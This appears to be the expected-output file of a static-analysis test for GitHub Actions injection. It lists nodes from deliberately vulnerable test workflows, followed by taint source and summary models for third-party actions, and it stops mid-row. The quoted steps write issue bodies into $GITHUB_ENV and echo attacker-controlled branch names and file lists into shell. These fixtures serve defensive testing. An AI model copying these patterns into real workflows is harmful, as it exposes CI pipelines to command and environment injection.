.github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | 
.github/workflows/multiline.yml@34:9:40:6 | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | 
.github/workflows/multiline.yml@64:14:65:136 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses 
Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | 
Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:14:22:40 | .github/workflows/poisonable_steps.yml@22:14:22:40 | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:9:24:6 | .github/workflows/poisonable_steps.yml@23:9:24:6 | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:14:23:50 | .github/workflows/poisonable_steps.yml@23:14:23:50 | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:24:9:25:6 | .github/workflows/poisonable_steps.yml@24:9:25:6 | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:14:24:29 | .github/workflows/poisonable_steps.yml@24:14:24:29 | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:25:9:26:6 | .github/workflows/poisonable_steps.yml@25:9:26:6 | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:14:25:73 | .github/workflows/poisonable_steps.yml@25:14:25:73 | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:26:9:27:6 | .github/workflows/poisonable_steps.yml@26:9:27:6 | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:14:26:78 | .github/workflows/poisonable_steps.yml@26:14:26:78 | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:27:9:28:6 | .github/workflows/poisonable_steps.yml@27:9:28:6 | -| 
.github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:29:9:30:6 | .github/workflows/poisonable_steps.yml@29:9:30:6 | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | 
.github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | -| 
.github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:9:41:6 | .github/workflows/poisonable_steps.yml@40:9:41:6 | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:9:42:6 | .github/workflows/poisonable_steps.yml@41:9:42:6 | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:14:41:22 | .github/workflows/poisonable_steps.yml@41:14:41:22 | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:9:46:111 | .github/workflows/poisonable_steps.yml@42:9:46:111 | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:14:46:111 | .github/workflows/poisonable_steps.yml@42:14:46:111 | -| 
.github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:44:32:44:50 | .github/workflows/poisonable_steps.yml@44:32:44:50 | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| 
.github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | -scopes -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/multiline2.yml:1:1:89:35 | on: | -| .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/test.yml:1:1:40:53 | on: push | -sources -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES | filename | manual | -| AvraamMavridis/files-changed-action | * | output.CHANGED_FILES_EXTENSIONS | filename | manual | -| Rishabh510/Path-lister-action | * | output.paths | filename | manual | -| WyriHaximus/github-action-files-in-commit | * | output.files | filename | manual | -| ab185508/file-type-finder | * | output.extaddpaths | filename | manual | -| ab185508/file-type-finder | * | output.names | filename | manual | -| ab185508/file-type-finder | * | output.paths | filename | manual | -| ahmadnassri/action-changed-files | * | output.files | filename | manual | -| ahmadnassri/action-changed-files | * | output.json | json | manual | -| alessbell/pull-request-comment-branch | * | output.head_ref | branch | manual | -| amannn/action-semantic-pull-request | * | output.error_message | text | manual | -| ankitjain28may/list-files-in-pr | * | 
output.pullRequestFiles | filename | manual | -| cypress-io/github-action | * | env.GH_BRANCH | branch | manual | -| dawidd6/action-download-artifact | * | output.artifacts | artifact | manual | -| eficode/resolve-pr-refs | * | output.head_ref | branch | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | text | manual | -| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | title | manual | -| googlecloudplatform/magic-modules | * | output.changed-files | filename | manual | -| gotson/pull-request-comment-branch | * | output.head_ref | branch | manual | -| jitterbit/get-changed-files | * | output.added | filename | manual | -| jitterbit/get-changed-files | * | output.added_modified | filename | manual | -| jitterbit/get-changed-files | * | output.all | filename | manual | -| jitterbit/get-changed-files | * | output.deleted | filename | manual | -| jitterbit/get-changed-files | * | output.modified | filename | manual | -| jitterbit/get-changed-files | * | output.removed | filename | manual | -| jitterbit/get-changed-files | * | output.renamed | filename | manual | -| jsmith/changes-since-last-tag | * | output.added | filename | manual | -| jsmith/changes-since-last-tag | * | output.files | filename | manual | -| jsmith/changes-since-last-tag | * | output.modified | filename | manual | -| jsmith/changes-since-last-tag | * | output.removed | filename | manual | -| jsmith/changes-since-last-tag | * | output.renamed | filename | manual | -| karpikpl/list-changed-files-action | * | output.changed_files | filename | manual | -| khan/pull-request-comment-trigger | * | output.comment_body | text | manual | -| knu/changed-files | * | output.changed_files | filename | manual | -| knu/changed-files | * | output.changed_files_json | filename | manual | -| knu/changed-files | * | output.matched_files | filename | manual | -| knu/changed-files | * | output.matched_files_json | filename | manual | -| lots0logs/gh-action-get-changed-files | 
* | output.added | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.all | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.modified | PR changed files | manual | -| lots0logs/gh-action-get-changed-files | * | output.renamed | PR changed files | manual | -| marocchino/on_artifact | * | output.* | artifact | manual | -| martinhaintz/ga-file-list | * | output.file_names | filename | manual | -| martinhaintz/ga-file-list | * | output.files | filename | manual | -| peter-murray/issue-body-parser-action | * | output.* | text | manual | -| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | -| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | -| redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | -| the-coding-turtle/ga-file-list | * | output.file_names | filename | manual | -| the-coding-turtle/ga-file-list | * | output.files | filename | manual | -| tj-actions/branch-names | * | output.current_branch | branch | manual | -| tj-actions/branch-names | * | output.head_ref_branch | branch | manual | -| trilom/file-changes-action | * | output.files | filename | manual | -| trilom/file-changes-action | * | output.files_added | filename | manual | -| trilom/file-changes-action | * | output.files_modified | filename | manual | -| trilom/file-changes-action | * | output.files_removed | filename | manual | -| tzkhan/pr-update-action | * | output.headMatch | branch | manual | -| w3f/action-find-old-files | * | output.files | filename | manual | -| xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| yumemi-inc/changed-files | * | output.files | filename | manual | -summaries -| ActionsTools/read-json-action | * | artifact | output.* | taint | manual | -| BrycensRanch/read-properties-action | * | artifact | output.* | taint | manual | -| Reedyuk/read-properties | * | artifact | 
output.value | taint | manual | -| SebRollen/toml-action | * | artifact | output.value | taint | manual | -| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | -| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | -| andstor/file-reader-action | * | artifact | output.contents | taint | manual | -| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | -| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | -| artlaman/conventional-changelog-reader-action | * | artifact | output.* | taint | manual | -| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | -| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | -| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | -| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | -| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | -| 
aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | -| bfren/read-file | * | artifact | output.contents | taint | manual | -| bobheadxi/deployments | * | input.env | output.env | taint | manual | -| browniebroke/read-nvmrc-action | * | artifact | output.node_version | taint | manual | -| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | -| c-py/action-dotenv-to-setenv | * | artifact | output.* | taint | manual | -| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | -| christian-draeger/read-properties | * | artifact | output.* | taint | manual | -| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | -| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | -| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | -| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | -| dangdennis/toml-action | * | artifact | output.value | taint | manual | -| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | -| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | -| drawpile/drawpile | * | input.path | output.path | taint | manual | -| duskmoon314/action-load-env | * | artifact | output.* | taint | manual | -| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | -| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | -| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | -| 
frabert/replace-string-action | * | input.replace-with | output.replaced | taint | manual | -| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | -| gagle/package-version | * | artifact | output.version | taint | manual | -| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | -| getsentry/action-release | * | input.version | output.version | taint | manual | -| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | -| github/codeql-action | * | input.output | output.sarif-output | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | -| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | -| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | -| guibranco/github-file-reader-action-v2 | * | artifact | output.contents | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | -| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | -| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | -| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | -| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | -| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | -| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | -| 
hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | -| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | -| igorskyflyer/action-readfile | * | artifact | output.content | taint | manual | -| jaywcjlove/github-action-read-file | * | artifact | output.content | taint | manual | -| jbutcher5/read-yaml | * | artifact | output.data | taint | manual | -| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | -| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | -| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | -| juliangruber/read-file-action | * | artifact | output.content | taint | manual | -| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | -| komorebitech/read-files-action | * | artifact | output.content | taint | manual | -| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | -| kurt-code/gha-properties | * | artifact | output.* | taint | manual | -| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | -| linkerd/linkerd2 | * | input.component | output.image | taint | manual | -| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | -| linkerd/linkerd2 | * | input.tag | output.image | taint 